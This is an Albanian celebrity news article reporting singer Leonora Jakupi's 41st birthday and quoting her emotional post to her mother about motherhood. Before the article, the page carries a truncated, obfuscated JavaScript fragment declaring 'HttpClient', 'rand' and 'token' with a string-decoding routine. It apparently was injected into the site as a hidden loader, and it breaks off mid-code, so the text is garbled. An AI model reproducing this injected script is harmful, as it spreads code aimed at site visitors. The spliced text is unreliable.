;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Në ditëlindjen e saj, Leonora flet si rrallë herë për mëmësinë!

By

Këngëtarja Leonora Jakupi sot feston ditëlindjen e saj të 41-të.

Siç shkruam dy ditë më parë, bashkë me nënë, motrën dhe mbesën, në prag të ditëlindjes, Leonora shijoi disa ditë në Stamboll.

E kur 3 Marsi erdhi, vetë këngëtarja ka zgjedhur të bëjë një postim të veçantë në rrjete sociale krah nënës së saj, të cilës i dha epitetin e prindit 41 vite më parë.

Në shkrimin emocional, siç vepron rrallë herë, Leonora ka folur shkurtimisht edhe për mundësinë e bërjes vetë nënë, synim të cilin vazhdon ta ketë në objektivat e saj duke u lutur që në atë ditë ta ketë nënën e saj pranë.

‘Në këtë ditë të veçantë për Ty , dua të t’falenderoj për cdo sakrificë tënden e shtrenjta ime! Jeta nuk ka qenë e lehtë për ty e as për mua , së bashku ja dolëm mbanë të gjitha sfidave të jetës. Prandaj kjo është dita jote,dita kur ti u bëre nënë për herë të parë! Lus Zotin të t’kem me jetë të gjatë e ditët e lindjes time ti pres në krahrorin tënd’ – ka deklaruar këngëtarja e njohur në postimin e bërë.

Shumë urime! /Prive.al

Artikuj të ngjashëm